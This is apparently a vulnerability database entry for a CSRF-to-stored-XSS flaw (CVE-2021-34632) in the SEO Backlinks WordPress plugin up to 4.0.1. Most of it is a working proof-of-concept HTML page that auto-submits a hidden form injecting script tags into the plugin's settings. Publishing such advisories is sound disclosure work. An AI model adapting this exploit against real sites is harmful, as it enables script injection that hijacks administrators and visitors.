Lucene search
WordfenceWPEX-ID:7CFEFCC9-ADBF-4AFC-B25F-92F417650359HistoryJul 28, 2021 - 12:00 a.m.
SEO Backlinks <= 4.0.1 - CSRF to Stored XSS
2021-07-2800:00:00
Wordfence
116
0.001 Low
EPSS
Percentile
47.2%
The SEO Backlinks WordPress plugin is vulnerable to Cross-Site Request Forgery via the loc_config function found in the ~/seo-backlinks.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 4.0.1.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>CSRF PoC</title>
</head>
<body onload="csrfSubmit();">
<form target="dummyfrm" name="evilform" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=loc_menu" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="loc_sensitive" value="No" />
<input type="hidden" name="loc_target_blank" value="No" />
<input type="hidden" name="loc_back" value="Yes" />
<input type="hidden" name="key_1" value=""><script>alert(1)</script>" />
<input type="hidden" name="url_1" value=""><script>alert(1)</script>" />
<input type="hidden" name="key_2" value="" />
<input type="hidden" name="url_2" value="" />
<input type="hidden" name="submitted" value="" />
</form>
<iframe src="x" width="1" height="1" name="dummyfrm" style="visibility:hidden"></iframe>
<script>
function csrfSubmit(){
let submit = HTMLFormElement.prototype["submit"].bind(document.evilform);
submit();
}
</script>
<p>CSRF PoC</p>
</html>Related
wpvulndb
wpvulndb
SEO Backlinks <= 4.0.1 - CSRF to Stored XSS
2021-07-28 00:00:00
nvd
nvd
CVE-2021-34632
2021-08-02 21:15:08
prion
prion
Cross site request forgery (csrf)
2021-08-02 21:15:00
patchstack
patchstack
cvelist
cvelist
cve
cve
CVE-2021-34632
2021-08-02 21:15:08